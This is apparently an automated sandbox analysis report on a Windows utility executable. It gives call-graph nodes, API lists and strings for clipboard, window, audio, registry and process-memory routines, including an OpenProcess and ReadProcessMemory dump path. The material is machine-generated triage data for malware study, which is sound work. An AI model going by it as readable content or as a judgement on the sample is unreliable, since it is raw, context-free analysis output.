5123->5124 5125 407325 SendMessageA 5124->5125 5127 4076e8 5125->5127 6106 40f1f9 6107 40f115 3 API calls 6106->6107 6108 40f202 6107->6108 6109 40d7fc 6110 40d809 9 API calls 6109->6110 6111 40d8ac 6109->6111 6110->6111 6112 40a5fd GetFileTime CloseHandle 6113 40a627 6112->6113 6118 409895 6112->6118 6121 4030a1 6113->6121 6116 40a68f 6138 403168 6116->6138 6119 402883 4 API calls 6120 40a658 6119->6120 6120->6116 6120->6119 6128 4030d0 6120->6128 6122 403168 FindClose 6121->6122 6123 4030ab 6122->6123 6124 40223f 2 API calls 6123->6124 6125 4030bc 6124->6125 6126 4023ae 2 API calls 6125->6126 6127 4030c8 6126->6127 6127->6120 6129 4030db FindFirstFileA 6128->6129 6130 4030fc FindNextFileA 6128->6130 6131 403117 6129->6131 6132 403112 6130->6132 6133 40311e strlen strlen 6130->6133 6131->6133 6135 403157 6131->6135 6134 403168 FindClose 6132->6134 6133->6135 6136 40314e 6133->6136 6134->6131 6135->6120 6137 40249d 4 API calls 6136->6137 6137->6135 6139 403171 FindClose 6138->6139 6140 40317b 6138->6140 6139->6140 6140->6118 6141 404181 6142 40419b 6141->6142 6153 4041b6 6141->6153 6143 404292 6142->6143 6144 40423c 6142->6144 6142->6153 6145 40430a 6143->6145 6146 40429a 6143->6146 6149 404250 memset 6144->6149 6144->6153 6147 404361 6145->6147 6148 404312 6145->6148 6151 4042ae memset 6146->6151 6146->6153 6150 404423 6147->6150 6147->6153 6154 404381 memset 6147->6154 6152 404326 memset 6148->6152 6148->6153 6149->6153 6150->6153 6155 40443b memset 6150->6155 6151->6153 6152->6153 6156 4043b2 memcpy 6154->6156 6155->6153 6156->6150 6158 403782 GetMonitorInfoA 6159 4037ac 6158->6159 6162 4037cd 6158->6162 6160 4037b5 ??3@YAXPAX 6159->6160 6161 4037be 6159->6161 6160->6162 6163 402269 3 API calls 6161->6163 6163->6162 6164 406f83 6165 407250 ShowWindow 6164->6165 6166 4076e8 6165->6166 5128 410c84 5129 4108e8 2 API calls 5128->5129 5130 410c8e 5129->5130 6167 406585 6168 40dc41 15 API calls 6167->6168 6169 40659a 6168->6169 6170 4065a2 memset memset 6169->6170 6180 406773 6169->6180 6171 405984 _strcmpi 6170->6171 6172 4065e7 6171->6172 6174 405984 _strcmpi 6172->6174 6173 4059bd MessageBoxA 6191 406771 6173->6191 6175 4065fc 6174->6175 6176 405984 _strcmpi 6175->6176 6177 40660e 6176->6177 6178 40e03d 19 API calls 6177->6178 6179 40664e 6178->6179 6179->6180 6181 40665c memcpy 6179->6181 6180->6173 6181->6180 6182 406681 memset _mbscpy 6181->6182 6183 4066bc 6182->6183 6192 40de35 6183->6192 6186 406732 6207 404f4b OpenProcess 6186->6207 6187 406719 memcpy 6187->6186 6190 405a52 9 API calls 6190->6191 6193 40de44 6192->6193 6194 402423 GetVersionExA 6193->6194 6195 40de51 6194->6195 6197 40de65 OpenProcess 6195->6197 6203 40df6a 6195->6203 6196 40670f 6196->6186 6196->6187 6197->6196 6205 40de7f 6197->6205 6198 40e029 CloseHandle 6198->6196 6199 40deba memset memset 6199->6205 6200 40dfb0 memset _mbscpy 6201 40e28f 7 API calls 6200->6201 6201->6203 6202 40dc6c 10 API calls 6202->6205 6203->6196 6203->6198 6203->6200 6205->6198 6205->6199 6205->6202 6206 40df65 6205->6206 6221 40e28f 6205->6221 6206->6198 6208 405063 GetLastError 6207->6208 6209 404f6e 6207->6209 6211 40506c 6208->6211 6226 40218d CreateFileA 6209->6226 6211->6190 6211->6191 6212 404f76 6213 404f83 ??2@YAPAXI 6212->6213 6214 40504f GetLastError 6212->6214 6215 405039 ??3@YAXPAX CloseHandle 6213->6215 6220 404faa 6213->6220 6216 405058 CloseHandle 6214->6216 6215->6216 6216->6211 6217 404fcd ReadProcessMemory 6217->6220 6218 404ff0 WriteFile 6218->6220 6220->6215 6220->6217 6220->6218 6227 40266f ??2@YAPAXI ??2@YAPAXI 6220->6227 6222 40e185 6 API calls 6221->6222 6223 40e2a2 6222->6223 6224 40e2a7 memcpy 6223->6224 6225 40e2c8 6223->6225 6224->6225 6225->6205 6226->6212 6228 40279d ??3@YAXPAX ??3@YAXPAX 6227->6228 6233 4026a8 6227->6233 6228->6220 6229 4026c8 sprintf 6229->6233 6230 4026ee sprintf memcpy 6230->6233 6231 402732 memset 6231->6233 6232 4021a6 strlen WriteFile 6232->6233 6233->6228 6233->6229 6233->6230 6233->6231 6233->6232 6234 40e988 6241 40e8d5 RegCreateKeyExA 6234->6241 6236 40e99f 6237 40e9a6 RegSetValueExA 6236->6237 6238 40e9cf 6236->6238 6239 40e9c5 6237->6239 6240 40e9c6 RegCloseKey 6237->6240 6239->6240 6240->6238 6241->6236 5131 40848d CoInitialize 5142 40f511 5131->5142 5133 40853f MessageBoxA 5137 408566 ??3@YAXPAX 5133->5137 5138 40856d 5133->5138 5134 40f511 ??3@YAXPAX memset wcscmp 5136 4084bc 5134->5136 5136->5133 5136->5134 5139 4084df memset WideCharToMultiByte 5136->5139 5141 402fee 7 API calls 5136->5141 5137->5138 5146 402fee 5139->5146 5141->5136 5143 40f520 5142->5143 5144 40f525 5142->5144 5153 40fb00 5143->5153 5144->5136 5147 403000 5146->5147 5148 402ffb 5146->5148 5149 40300f strlen 5147->5149 5150 403006 strlen 5147->5150 5148->5149 5151 402f66 4 API calls 5149->5151 5150->5149 5152 403027 memcpy 5151->5152 5152->5136 5154 40e631 ??3@YAXPAX 5153->5154 5155 40fb16 5154->5155 5156 40fb58 5155->5156 5162 40f67f 5155->5162 5156->5144 5160 40fb4d 5161 40f6f2 wcscmp 5160->5161 5161->5156 5164 40f69c 5162->5164 5163 40f6e3 5166 40f6f2 5163->5166 5164->5163 5170 40f5bc 5164->5170 5167 40f70e 5166->5167 5169 40f732 5167->5169 5174 40fc8a 5167->5174 5169->5160 5171 40f5d6 5170->5171 5172 40f5de memset 5171->5172 5173 40f602 5171->5173 5172->5173 5173->5164 5175 40fc96 5174->5175 5176 40fcbe 5174->5176 5175->5176 5177 40fca3 wcscmp 5175->5177 5176->5169 5177->5175 5177->5176 5178 40ac8d atoi atoi 5179 40acdb DeviceIoControl 5178->5179 5180 40accc atoi 5178->5180 5181 40ac62 CloseHandle 5179->5181 5180->5179 5181->5178 5182 403c90 5183 40415b _strcmpi 5182->5183 5184 40416c 5183->5184 5185 404178 5183->5185 5184->5183 5184->5185 5186 407290 5187 4072a4 5186->5187 5188 4076e8 5186->5188 5189 40299d 6 API calls 5187->5189 5190 4072cf SetWindowPos 5187->5190 5189->5187 5190->5188 6242 40af91 6243 40e03d 19 API calls 6242->6243 6245 40af7f 6243->6245 6244 409895 6245->6242 6245->6244 6246 405d93 memset 6247 40223f 2 API calls 6246->6247 6248 405dcf 6247->6248 6249 40e6d7 8 API calls 6248->6249 6250 405de2 6249->6250 6251 40223f 2 API calls 6250->6251 6252 405e07 6251->6252 6253 40223f 2 API calls 6252->6253 6254 405e15 6253->6254 6255 40223f 2 API calls 6254->6255 6256 405e23 6255->6256 6257 40223f 2 API calls 6256->6257 6258 405e31 6257->6258 6259 40e6d7 8 API calls 6258->6259 6260 405e45 6259->6260 6261 407394 GetParent 6262 4073a3 GetDesktopWindow 6261->6262 6263 4073a9 GetWindowRect GetWindowRect 6261->6263 6262->6263 6264 4073e6 SetWindowPos 6263->6264 6266 4076e8 6264->6266 5195 401697 5215 410c10 5195->5215 5197 4016a4 OleGetClipboard 5198 4016c2 5197->5198 5199 40189c 5197->5199 5198->5199 5217 40218d CreateFileA 5198->5217 5201 4016df 5201->5199 5202 4016ec memset 5201->5202 5203 401726 memset 5202->5203 5204 4017ea 5203->5204 5208 401753 5203->5208 5223 402dfb WriteFile 5204->5223 5206 401891 CloseHandle 5206->5199 5208->5204 5209 4017ce ReleaseStgMedium 5208->5209 5210 401783 GetClipboardFormatNameA 5208->5210 5218 40162e 5208->5218 5209->5208 5210->5208 5211 40162e 4 API calls 5213 401826 5211->5213 5212 40187d ReleaseStgMedium 5212->5213 5213->5206 5213->5211 5213->5212 5224 40155d 5213->5224 5216 410c17 5215->5216 5216->5197 5216->5216 5217->5201 5219 401641 GlobalFix GlobalSize GlobalUnWire 5218->5219 5221 401660 5218->5221 5220 40168a 5219->5220 5220->5208 5221->5220 5222 40166a memset 5221->5222 5222->5220 5223->5213 5225 40159d 5224->5225 5226 40156e GlobalFix GlobalSize 5224->5226 5227 401627 5225->5227 5230 4015ae memset 5225->5230 5236 402dfb WriteFile 5226->5236 5227->5213 5229 40158c GlobalUnWire 5229->5227 5231 4015ce 5230->5231 5231->5227 5232 4015d2 ??2@YAPAXI 5231->5232 5233 4015f8 5232->5233 5237 402dfb WriteFile 5233->5237 5235 40161c ??3@YAXPAX 5235->5227 5236->5229 5237->5235 5243 40a498 5256 405984 5243->5256 5246 405984 _strcmpi 5247 40a4c3 atoi 5246->5247 5249 40a4f1 5247->5249 5260 40d9bf LoadLibraryA 5249->5260 5252 40a502 GetLastError 5253 4020ef 6 API calls 5252->5253 5254 40a51c sprintf 5253->5254 5255 409895 5254->5255 5257 405990 5256->5257 5258 4059b1 5256->5258 5257->5258 5259 405992 _strcmpi 5257->5259 5258->5246 5259->5257 5259->5258 5261 40a4f7 5260->5261 5262 40d9d4 GetProcAddress 5260->5262 5261->5252 5261->5255 5263 40d9e4 5262->5263 5264 40d9f9 FreeLibrary 5262->5264 5263->5264 5264->5261 6267 40619a 6268 40e185 6 API calls 6267->6268 6269 4061ba 6268->6269 5265 40349b CoInitialize 5266 40352a 5265->5266 5267 4034b9 5265->5267 5267->5266 5268 403500 MultiByteToWideChar 5267->5268 5268->5266 5269 40ee9c LoadLibraryA 5270 40ef64 5269->5270 5271 40eeb7 9 API calls 5269->5271 5271->5270 5272 410c9c 5273 410ca6 5272->5273 5274 4108e8 2 API calls 5273->5274 5275 410cb0 5274->5275 6270 40ab9d 6271 40abb0 atoi 6270->6271 6272 40abbf atoi 6270->6272 6271->6272 6276 40abdc 6272->6276 6273 40abe4 DeviceIoControl 6273->6276 6274 40ac62 CloseHandle 6275 40ac8d atoi atoi 6274->6275 6277 40acdb DeviceIoControl 6275->6277 6278 40accc atoi 6275->6278 6276->6273 6276->6274 6279 40ac38 DeviceIoControl 6276->6279 6277->6274 6278->6277 6279->6276 5276 401c9f memset MultiByteToWideChar 5277 401baa 11 API calls 5276->5277 5278 401ce9 5277->5278 5279 403a9f _mbsicmp 5280 403ac7 memset strlen 5279->5280 5281 403abb 5279->5281 5282 403af5 _snprintf 5280->5282 5283 403b0d 5280->5283 5282->5283 5283->5281 5284 403b27 _mbsicmp 5283->5284 5285 403b3d _mbsicmp 5283->5285 5284->5281 5284->5285 5285->5281 5285->5283 5286 4018a1 5287 4018ae 5286->5287 5305 402174 CreateFileA 5287->5305 5289 4018b7 5290 4019d1 5289->5290 5291 4018c6 memset 5289->5291 5306 4027e6 ReadFile 5291->5306 5293 4018f1 5294 4019c7 CloseHandle 5293->5294 5307 4027e6 ReadFile 5293->5307 5294->5290 5296 40192a OpenClipboard 5296->5294 5297 40193c EmptyClipboard 5296->5297 5298 4019c1 CloseClipboard 5297->5298 5301 401946 5297->5301 5298->5294 5299 401971 GlobalAlloc GlobalFix 5299->5301 5300 401964 RegisterClipboardFormatA 5300->5299 5301->5298 5301->5299 5301->5300 5303 4019c0 5301->5303 5308 402e1a SetFilePointer 5301->5308 5303->5298 5305->5289 5306->5293 5307->5296 5311 4027e6 ReadFile 5308->5311 5310 401999 GlobalUnWire SetClipboardData 5310->5301 5311->5310 6283 40f9a5 6284 40e631 ??3@YAXPAX 6283->6284 6286 40f9b7 6284->6286 6285 40faf3 6286->6285 6288 40f7b7 memset 6286->6288 6289 40f7ff 6288->6289 6290 40f811 wcscpy 6289->6290 6291 40f83b 6289->6291 6290->6291 6292 40f82a 6290->6292 6294 40f8c4 memcmp 6291->6294 6296 40f861 memcmp 6291->6296 6292->6291 6293 40f82f wcscpy 6292->6293 6293->6291 6295 40f8db 6294->6295 6307 40f931 6295->6307 6298 40f878 6296->6298 6299 40f87e memcmp 6296->6299 6298->6299 6299->6294 6303 40f895 6299->6303 6301 40f901 6304 40f918 6301->6304 6305 40f909 wcscpy 6301->6305 6302 40f92a 6302->6286 6303->6294 6311 41079a 6304->6311 6305->6304 6309 40f947 6307->6309 6308 40f8ea memcmp 6308->6301 6308->6302 6309->6308 6310 40f7b7 12 API calls 6309->6310 6310->6309 6312 4107a5 6311->6312 6316 4107c9 6311->6316 6313 4107b7 6312->6313 6314 4107ae ??3@YAXPAX 6312->6314 6315 402269 3 API calls 6313->6315 6314->6316 6315->6316 6316->6302 6317 40efa9 6318 40efbe 6317->6318 6319 40efc4 6318->6319 6320 40f015 GetLastError 6318->6320 6321 40f003 GetLastError 6319->6321 6322 40efd8 6319->6322 6324 40effa 6320->6324 6321->6324 6323 40eff2 GetLastError 6322->6323 6322->6324 6323->6324 5312 40a0aa 5313 40a0cd sprintf 5312->5313 5314 4020ef 6 API calls 5312->5314 5315 409895 5313->5315 5316 40a0fe 5313->5316 5314->5313 5317 40a0b3 GetLastError 5316->5317 5318 40a464 GetProcAddress 5316->5318 5319 4020ef 6 API calls 5317->5319 5320 40a473 FreeLibrary 5318->5320 5319->5313 5321 4076ab 5322 4076b7 5321->5322 5323 402a1d 2 API calls 5322->5323 5324 4076c6 5323->5324 5325 4076e8 5324->5325 5326 4076df FreeLibrary 5324->5326 5326->5325 6325 4075ab 6326 4028f0 8 API calls 6325->6326 6327 4075b9 GetDlgItem 6326->6327 6328 4075c4 SetFocus 6327->6328 6329 4076e8 6328->6329 4227 4109ae 4246 410b9c 4227->4246 4229 4109ba GetModuleHandleA 4230 4109cc __set_app_type __p__fmode __p__commode 4229->4230 4232 410a5e 4230->4232 4233 410a72 4232->4233 4234 410a66 __setusermatherr 4232->4234 4247 410b86 _controlfp 4233->4247 4234->4233 4236 410a77 _initterm __getmainargs _initterm 4237 410ace GetStartupInfoA 4236->4237 4239 410b02 GetModuleHandleA 4237->4239 4248 403608 4239->4248 4243 410b33 _cexit 4245 410b68 4243->4245 4244 410b2c exit 4244->4243 4246->4229 4247->4236 4249 403615 4248->4249 4256 408817 4249->4256 4251 40363f 4252 403643 DialogBoxParamA 4251->4252 4253 40365a 4251->4253 4252->4253 4263 40367c 4253->4263 4257 408824 4256->4257 4272 4051e9 memset memset 4257->4272 4259 408883 4259->4251 4260 408840 4260->4259 4274 40531a 4260->4274 4408 402e62 ??3@YAXPAX ??3@YAXPAX 4263->4408 4265 403688 4409 402e62 ??3@YAXPAX ??3@YAXPAX 4265->4409 4267 403693 4410 402e62 ??3@YAXPAX ??3@YAXPAX 4267->4410 4269 40369e 4270 403673 4269->4270 4271 4036aa FreeLibrary 4269->4271 4270->4243 4270->4244 4271->4270 4273 405232 4272->4273 4273->4260 4275 405975 _mbscpy 4274->4275 4311 405338 4274->4311 4275->4259 4275->4260 4276 405380 strtoul 4276->4311 4277 405422 memcpy _strnicmp 4278 405453 memset 4277->4278 4279 4054b8 _strnicmp 4277->4279 4317 405f1f _strcmpi 4278->4317 4281 405536 _strnicmp 4279->4281 4282 4054cf memset _itoa strlen 4279->4282 4283 4055b8 _strnicmp 4281->4283 4284 40554d memset GetDateFormatA strlen 4281->4284 4282->4311 4286 40563a _strnicmp 4283->4286 4287 4055cf memset GetTimeFormatA strlen 4283->4287 4284->4311 4285 405484 strlen 4285->4311 4288 405651 memset GetEnvironmentVariableA 4286->4288 4289 4056a6 _strnicmp 4286->4289 4287->4311 4288->4311 4290 405731 _strnicmp 4289->4290 4291 4056bd memset _strcmpi 4289->4291 4293 405861 _strnicmp 4290->4293 4290->4311 4291->4311 4292 4058c8 memcpy 4292->4311 4295 4058d8 _strnicmp 4293->4295 4296 405878 atoi 4293->4296 4298 4058ef OpenClipboard 4295->4298 4295->4311 4296->4311 4300 4058fa GetClipboardData 4298->4300 4298->4311 4299 4056fa strlen 4299->4311 4301 405947 CloseClipboard 4300->4301 4302 405909 GlobalFix 4300->4302 4301->4311 4302->4301 4305 405916 strlen 4302->4305 4303 4058a3 strlen 4303->4311 4304 40577c strlen 4304->4311 4307 405923 4305->4307 4308 40593e GlobalUnWire 4305->4308 4307->4308 4309 405931 memcpy 4307->4309 4308->4301 4309->4308 4311->4275 4311->4276 4311->4277 4311->4285 4311->4292 4311->4303 4311->4304 4313 402f8c ??3@YAXPAX 4311->4313 4314 402e88 7 API calls 4311->4314 4316 405837 memcpy 4311->4316 4332 4028de GetModuleFileNameA 4311->4332 4333 402f23 4311->4333 4337 402fb1 4311->4337 4343 40148a DialogBoxParamA 4311->4343 4344 402e88 strlen 4311->4344 4313->4311 4315 40581c strlen 4314->4315 4315->4311 4316->4311 4318 405f36 4317->4318 4319 405f3b 4317->4319 4370 40f21c 4318->4370 4354 405fcf _strcmpi 4319->4354 4323 405f57 _strcmpi 4324 405f68 GetSystemDirectoryA 4323->4324 4325 405f79 _strcmpi 4323->4325 4331 405f4e 4324->4331 4326 405f98 _strcmpi 4325->4326 4327 405f8a GetWindowsDirectoryA 4325->4327 4328 405fa9 4326->4328 4326->4331 4327->4331 4385 4028de GetModuleFileNameA 4328->4385 4330 405faf strlen 4330->4331 4331->4311 4332->4299 4334 402f29 4333->4334 4335 402f32 strcmp 4334->4335 4336 402f45 4334->4336 4335->4334 4335->4336 4336->4311 4338 402fb8 strlen 4337->4338 4339 402fe1 4337->4339 4395 402f66 4338->4395 4339->4311 4342 402fd2 memcpy 4342->4339 4343->4311 4345 402eb2 ??3@YAXPAX 4344->4345 4346 402ebb 4344->4346 4347 402ec5 4345->4347 4348 402269 3 API calls 4346->4348 4349 402ed5 ??3@YAXPAX 4347->4349 4350 402ede 4347->4350 4348->4347 4351 402eea memcpy 4349->4351 4352 402269 3 API calls 4350->4352 4351->4311 4353 402ee9 4352->4353 4353->4351 4355 405fea _strcmpi 4354->4355 4361 405f40 4354->4361 4356 406002 _strcmpi 4355->4356 4355->4361 4357 40601a _strcmpi 4356->4357 4356->4361 4358 406032 _strcmpi 4357->4358 4357->4361 4359 40604a _strcmpi 4358->4359 4358->4361 4360 406062 _strcmpi 4359->4360 4359->4361 4360->4361 4362 40607a _strcmpi 4360->4362 4361->4318 4361->4323 4362->4361 4363 406092 _strcmpi 4362->4363 4363->4361 4364 4060a7 _strcmpi 4363->4364 4364->4361 4365 4060bc _strcmpi 4364->4365 4365->4361 4366 4060d1 _strcmpi 4365->4366 4366->4361 4367 4060e6 _strcmpi 4366->4367 4367->4361 4368 4060fb _strcmpi 4367->4368 4368->4361 4369 40610c _strcmpi 4368->4369 4369->4361 4386 40f115 4370->4386 4373 40f25e memset 4374 40f27e RegOpenKeyExA 4373->4374 4379 40f2ea _mbscpy 4374->4379 4380 40f2bc 4374->4380 4375 4023ff GetVersionExA 4377 40f23a 4375->4377 4377->4373 4378 40f24f 4377->4378 4378->4331 4379->4378 4390 40f15a 4380->4390 4382 40f2c6 4394 40e8fd RegQueryValueExA 4382->4394 4384 40f2de RegCloseKey 4384->4379 4385->4330 4387 40f159 4386->4387 4388 40f11e LoadLibraryA 4386->4388 4387->4373 4387->4375 4388->4387 4389 40f132 GetProcAddress GetProcAddress 4388->4389 4389->4387 4392 40f15f 4390->4392 4391 40f1ed _mbscpy 4391->4382 4392->4391 4393 40f1c2 4392->4393 4393->4382 4394->4384 4396 402f71 ??3@YAXPAX 4395->4396 4397 402f7d 4395->4397 4398 402f88 4396->4398 4400 402269 4397->4400 4398->4339 4398->4342 4401 402270 malloc 4400->4401 4402 4022b6 4400->4402 4404 402291 4401->4404 4405 4022ac 4401->4405 4402->4398 4406 4022a5 ??3@YAXPAX 4404->4406 4407 402295 memcpy 4404->4407 4405->4398 4406->4405 4407->4406 4408->4265 4409->4267 4410->4269 6330 4071b2 IsWindowVisible 6331 406fa1 ShowWindow 6330->6331 6333 4076e8 6331->6333 5333 402cb5 GetClipboardData 5334 402d4b CloseClipboard 5333->5334 5335 402ccf GlobalFix 5333->5335 5336 402d4a 5335->5336 5337 402cdd 5335->5337 5336->5334 5338 402ce3 CreateFileA SetFilePointer 5337->5338 5339 402d07 5337->5339 5342 402d0f 5338->5342 5348 40218d CreateFileA 5339->5348 5341 402d40 GlobalUnWire 5341->5336 5342->5341 5349 4021a6 strlen WriteFile 5342->5349 5344 402d1e 5345 402d32 CloseHandle 5344->5345 5350 4021a6 strlen WriteFile 5344->5350 5345->5341 5347 402d30 5347->5345 5348->5342 5349->5344 5350->5347 6334 404bb7 6337 4107f3 memset RegOpenKeyExA 6334->6337 6338 41083a 6337->6338 6339 41085c 6337->6339 6347 40e8fd RegQueryValueExA 6338->6347 6341 410864 waveOutGetNumDevs 6339->6341 6342 404bce 6339->6342 6341->6342 6344 410876 memset waveOutGetDevCapsA 6341->6344 6343 410850 RegCloseKey 6343->6339 6345 410890 _strcmpi 6344->6345 6346 4108a6 6344->6346 6345->6342 6345->6346 6346->6342 6346->6344 6347->6343 6348 4027b7 strlen strlen 6349 4027e2 6348->6349 6350 4027d4 _mbscat 6348->6350 6350->6349 5351 404cb8 waveOutGetVolume 5352 404cd1 waveOutSetVolume 5351->5352 5353 404d12 5351->5353 5352->5353 6351 4049b9 6352 4049d4 mixerOpen 6351->6352 6353 4049cd 6351->6353 6354 404b58 6352->6354 6355 4049ee memset mixerGetLineInfoA 6352->6355 6353->6352 6356 404a2d memset mixerGetLineControlsA 6355->6356 6357 404b4f mixerClose 6355->6357 6358 404a9c mixerGetControlDetailsA 6356->6358 6359 404b4e 6356->6359 6357->6354 6358->6359 6361 404ade mixerSetControlDetails 6358->6361 6359->6357 6361->6359 5355 406eba 5358 406d05 IsWindowVisible 5355->5358 5359 406eb1 5358->5359 5360 406d1f 5358->5360 5361 406d73 5360->5361 5362 406d2b memset GetClassNameA strcmp 5360->5362 5363 406d83 memset GetWindowTextA 5361->5363 5366 406dc9 5361->5366 5362->5359 5362->5361 5364 4021ea 3 API calls 5363->5364 5364->5366 5365 406de2 memset GetWindowThreadProcessId 5367 40dda8 6 API calls 5365->5367 5366->5359 5366->5365 5374 406e2c 5366->5374 5369 406e18 5367->5369 5371 4021ea 3 API calls 5369->5371 5370 406e49 5372 406e75 5370->5372 5373 406e4d 5370->5373 5371->5374 5399 405a62 _strcmpi 5372->5399 5383 4028f0 _strcmpi 5373->5383 5374->5359 5382 405a62 _strcmpi 5374->5382 5377 406e82 5377->5359 5380 4028f0 8 API calls 5377->5380 5378 406e5a GetDlgItem 5379 406eab SendMessageA 5378->5379 5379->5359 5381 406e93 GetDlgItem 5380->5381 5381->5379 5382->5370 5384 402901 5383->5384 5385 402905 _strcmpi 5383->5385 5384->5378 5386 402916 5385->5386 5387 40291a _strcmpi 5385->5387 5386->5378 5388 40292b 5387->5388 5389 40292d _strcmpi 5387->5389 5388->5378 5390 402942 _strcmpi 5389->5390 5391 40293e 5389->5391 5392 402953 5390->5392 5393 402957 _strcmpi 5390->5393 5391->5378 5392->5378 5394 402968 5393->5394 5395 40296c _strcmpi 5393->5395 5394->5378 5396 402981 _strcmpi 5395->5396 5397 40297d 5395->5397 5398 402992 5396->5398 5397->5378 5398->5378 5399->5377 5400 410cbe 5401 410cc7 ??3@YAXPAX 5400->5401 5402 410cce 5400->5402 5401->5402 6362 40f3bf 6363 40f3f8 6362->6363 6364 40f3cd GetCursorPos SetForegroundWindow TrackPopupMenu 6362->6364 6364->6363 6365 406fbf ShowWindow ShowWindow 6366 4076e8 6365->6366

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 407701-40776c memset GetWindowTextA strlen 1 407772-407786 call 405a62 0->1 2 4079ac-4079ae 0->2 8 4077a5-4077a7 1->8 9 407788-40779a _strcmpi 1->9 4 4079af-4079c5 call 405a62 2->4 10 4079c7-4079d2 IsWindowVisible 4->10 11 4079fa-407a09 call 405a62 4->11 13 4077a8-4077bc call 405a62 8->13 9->8 12 40779c-4077a3 9->12 10->11 14 4079d4-4079ec GetWindowRect 10->14 20 407aae-407ac2 call 405a62 11->20 21 407a0f-407a1a IsWindowVisible 11->21 12->13 22 4077db-4077ef call 405a62 13->22 23 4077be-4077d5 _strnicmp 13->23 14->11 17 4079ee-4079f2 14->17 17->11 31 407ad0-407ad5 20->31 32 407ac4-407ac8 20->32 21->20 25 407a20-407a5c memset GetClassNameA _strcmpi 21->25 33 4077f1-407801 call 4021ea 22->33 34 407807-40781b call 405a62 22->34 23->22 27 4077d7 23->27 25->20 30 407a5e-407a71 _strcmpi 25->30 27->22 30->20 35 407a73-407a86 _strcmpi 30->35 36 407ad7-407ae5 call 406ef4 31->36 37 407aea-407af1 31->37 32->31 33->34 45 407803 33->45 46 407862-407876 call 405a62 34->46 47 40781d-40782f strlen 34->47 35->20 40 407a88-407aa0 GetWindowRect 35->40 36->37 40->20 44 407aa2-407aa6 40->44 44->20 45->34 52 407898-4078ac call 405a62 46->52 53 407878-407892 call 402651 GetWindowLongA 46->53 47->46 48 407831-40785c strlen _strnicmp 47->48 48->46 50 40785e 48->50 50->46 59 4078ae-4078e9 memset GetClassNameA _strcmpi 52->59 60 4078ef-407903 call 405a62 52->60 53->52 58 407894 53->58 58->52 59->60 61 4078eb 59->61 60->4 64 407909-407914 IsWindowVisible 60->64 61->60 64->4 65 40791a-407930 GetWindowThreadProcessId 64->65 66 407951-407958 call 40dc41 65->66 67 407932-407949 call 402651 65->67 73 40795a-407996 memset call 40dda8 call 402395 _strcmpi 66->73 74 40799e-4079aa call 4059bd 66->74 67->4 72 40794b-40794f 67->72 72->4 73->4 81 407998-40799c 73->81 74->4 81->4
                                                      APIs
                                                      • memset.MSVCRT ref: 00407735
                                                      • GetWindowTextA.USER32(?,?,000003FF), ref: 00407749
                                                      • strlen.MSVCRT ref: 00407758
                                                      • _strcmpi.MSVCRT ref: 00407791
                                                      • _strnicmp.MSVCRT ref: 004077CB
                                                      • strlen.MSVCRT ref: 00407825
                                                      • strlen.MSVCRT ref: 0040783D
                                                      • _strnicmp.MSVCRT ref: 00407852
                                                      • GetWindowLongA.USER32(?,000000F4), ref: 00407888
                                                      • memset.MSVCRT ref: 004078BF
                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 004078D4
                                                      • _strcmpi.MSVCRT ref: 004078E0
                                                      • IsWindowVisible.USER32(?), ref: 0040790C
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00407927
                                                      • memset.MSVCRT ref: 0040796B
                                                        • Part of subcall function 0040DDA8: OpenProcess.KERNEL32(00000410,00000000,?,00000000,00000000,?,0040E0CB,?), ref: 0040DDD5
                                                        • Part of subcall function 0040DDA8: CloseHandle.KERNEL32(00000000,?,0040E0CB,?), ref: 0040DE15
                                                      • _strcmpi.MSVCRT ref: 0040798A
                                                      • IsWindowVisible.USER32(?), ref: 004079CA
                                                      • GetWindowRect.USER32(?,?), ref: 004079DC
                                                      • IsWindowVisible.USER32(?), ref: 00407A12
                                                      • memset.MSVCRT ref: 00407A32
                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 00407A43
                                                      • _strcmpi.MSVCRT ref: 00407A53
                                                      • _strcmpi.MSVCRT ref: 00407A68
                                                      • _strcmpi.MSVCRT ref: 00407A7D
                                                      • GetWindowRect.USER32(?,?), ref: 00407A90
                                                        • Part of subcall function 00405A62: _strcmpi.MSVCRT ref: 00405A6E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$_strcmpi$memset$Visiblestrlen$ClassNameProcessRect_strnicmp$CloseHandleLongOpenTextThread
                                                      • String ID: Failed to load the process library !$all$alltop$alltopnodesktop$button$class$etitle$ititle$process$progman$shell_traywnd$stitle$title
                                                      • API String ID: 3655397201-424509323
                                                      • Opcode ID: c64172875314b9973bf2933b0724a7f4cb4a9dc7c19dae22738bc9a285994996
                                                      • Instruction ID: c00615bfcac68849f2cc46ee02f1f7611d97ee1fd9a7f97ea116384e874721cc
                                                      • Opcode Fuzzy Hash: c64172875314b9973bf2933b0724a7f4cb4a9dc7c19dae22738bc9a285994996
                                                      • Instruction Fuzzy Hash: 89B171B26083056BE710AF65CC85B9BBBDCEF84744F14443FF944E2191E778DA448B5A

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
